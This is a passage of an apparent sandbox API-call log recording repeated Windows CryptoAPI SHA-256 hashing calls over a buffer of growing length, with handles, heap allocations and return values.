dwFlags=0x0) returned 1 [0179.349] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.350] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.350] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0179.350] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.350] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0179.350] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6c870, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c870, pdwDataLen=0xcdf6c) returned 1 [0179.350] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.350] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.350] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.351] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.351] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.351] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.351] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ca20 [0179.351] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ca20, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6ca20, pdwDataLen=0xcdf6c) returned 1 [0179.351] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.351] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.351] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0179.351] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.351] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x120, dwFlags=0x0) returned 1 [0179.352] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0179.352] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6c510, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c510, pdwDataLen=0xcdf6c) returned 1 [0179.352] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.352] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0179.352] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.352] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.352] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x140, dwFlags=0x0) returned 1 [0179.352] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c690 [0179.353] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6c690, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c690, pdwDataLen=0xcdf6c) returned 1 [0179.353] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.353] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.353] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0179.353] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.353] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x160, dwFlags=0x0) returned 1 [0179.353] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cbd0 [0179.354] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cbd0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cbd0, pdwDataLen=0xcdf6c) returned 1 [0179.354] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.354] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0179.354] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0179.354] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.354] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x180, dwFlags=0x0) returned 1 [0179.354] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.354] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c6c0 [0179.354] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6c6c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c6c0, pdwDataLen=0xcdf6c) returned 1 [0179.355] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.355] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0179.355] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0179.355] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.355] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0179.355] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.355] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c420 [0179.355] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6c420, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c420, pdwDataLen=0xcdf6c) returned 1 [0179.355] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.356] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0179.356] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338226d0) returned 1 [0179.356] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.356] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0179.356] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.356] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0179.356] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cd50, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cd50, pdwDataLen=0xcdf6c) returned 1 [0179.356] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.356] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0179.357] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0179.357] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.357] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0179.357] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.357] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c750 [0179.357] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6c750, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c750, pdwDataLen=0xcdf6c) returned 1 [0179.357] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.357] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0179.357] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0179.358] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.358] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x200, dwFlags=0x0) returned 1 [0179.358] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.358] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cb70 [0179.358] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cb70, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cb70, pdwDataLen=0xcdf6c) returned 1 [0179.358] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.358] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0179.358] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.359] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.359] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x220, dwFlags=0x0) returned 1 [0179.359] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.359] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0179.359] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cde0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cde0, pdwDataLen=0xcdf6c) returned 1 [0179.360] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.360] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.360] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.360] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.360] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x240, dwFlags=0x0) returned 1 [0179.360] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.360] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0179.360] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cc90, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cc90, pdwDataLen=0xcdf6c) returned 1 [0179.361] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.361] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.361] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0179.361] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.361] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x260, dwFlags=0x0) returned 1 [0179.361] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.361] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c780 [0179.361] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6c780, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c780, pdwDataLen=0xcdf6c) returned 1 [0179.362] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.362] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0179.362] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.362] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.362] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x280, dwFlags=0x0) returned 1 [0179.362] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c8d0 [0179.362] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6c8d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6c8d0, pdwDataLen=0xcdf6c) returned 1 [0179.362] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.363] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.363] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.363] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.363] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0179.363] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.363] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0179.363] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ce70, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6ce70, pdwDataLen=0xcdf6c) returned 1 [0179.363] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.363] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.364] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.364] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.364] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0179.364] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.364] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cea0 [0179.364] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6cea0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6cea0, pdwDataLen=0xcdf6c) returned 1 [0179.364] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.364] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.364] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0179.370] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.371] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0179.371] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.371] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d9b0 [0179.371] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d9b0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d9b0, pdwDataLen=0xcdf6c) returned 1 [0179.371] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.371] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0179.371] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0179.371] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.371] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x300, dwFlags=0x0) returned 1 [0179.371] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.372] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d380 [0179.372] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d380, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d380, pdwDataLen=0xcdf6c) returned 1 [0179.372] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.372] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0179.372] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.372] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.372] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x320, dwFlags=0x0) returned 1 [0179.372] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.372] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d7a0 [0179.372] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d7a0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d7a0, pdwDataLen=0xcdf6c) returned 1 [0179.373] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.373] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.373] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.373] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.373] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x340, dwFlags=0x0) returned 1 [0179.373] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.373] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d470 [0179.373] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d470, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d470, pdwDataLen=0xcdf6c) returned 1 [0179.373] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.373] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.374] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.374] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.374] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x360, dwFlags=0x0) returned 1 [0179.374] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.374] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d560 [0179.374] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d560, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d560, pdwDataLen=0xcdf6c) returned 1 [0179.374] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.374] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.374] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0179.375] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.375] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x380, dwFlags=0x0) returned 1 [0179.375] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d740 [0179.375] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6d740, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d740, pdwDataLen=0xcdf6c) returned 1 [0179.375] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.375] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0179.375] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0179.376] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.376] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0179.376] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.376] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6d980 [0179.376] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e6d980, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6d980, pdwDataLen=0xcdf6c) returned 1 [0179.376] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.376] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0179.376] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.377] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.377] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0179.377] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.377] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6db30 [0179.377] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6db30, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e6db30, pdwDataLen=0xcdf6c) returned 1 [0179.377] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.377] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.377] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.378] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.378] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0179.378] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0179.378] RtlAllocateHeap (HeapHandle=0x2150000, 